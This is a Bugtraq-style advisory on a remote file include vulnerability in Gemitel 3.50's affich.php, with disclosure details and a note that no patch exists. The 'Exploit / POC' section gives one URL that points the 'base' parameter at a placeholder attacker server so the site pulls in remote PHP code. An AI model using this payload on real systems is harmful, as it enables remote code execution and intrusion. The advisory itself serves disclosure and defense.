Gemitel Affich.PHP Remote File Include Command Injection Vulnerability
BID:10156
Info
Gemitel Affich.PHP Remote File Include Command Injection Vulnerability
| Bugtraq ID: | 10156 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 15 2004 12:00AM |
| Updated: | Apr 15 2004 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to "jaguar" <[email protected]>. |
| Vulnerable: |
isesam Gemitel 3.50 |
| Not Vulnerable: | |
Discussion
Gemitel Affich.PHP Remote File Include Command Injection Vulnerability
A vulnerability has been identified in the handling of input by Gemitel. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the vulnerable software.
It is possible to influence the include path of certain files, which could lead to an attacker including arbitrary PHP files from an external system.
A vulnerability has been identified in the handling of input by Gemitel. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the vulnerable software.
It is possible to influence the include path of certain files, which could lead to an attacker including arbitrary PHP files from an external system.
Exploit / POC
Gemitel Affich.PHP Remote File Include Command Injection Vulnerability
The following proof of concept has been supplied:
http://www.example.com/[Gemitel folder]/html/affich.php?base=http://[your server]/
The following proof of concept has been supplied:
http://www.example.com/[Gemitel folder]/html/affich.php?base=http://[your server]/
Solution / Fix
Gemitel Affich.PHP Remote File Include Command Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Gemitel Affich.PHP Remote File Include Command Injection Vulnerability
References:
References:
- Gemitel Homepage (isesam)
- Include vulnerability in GEMITEL v 3.50 ("jaguar"
)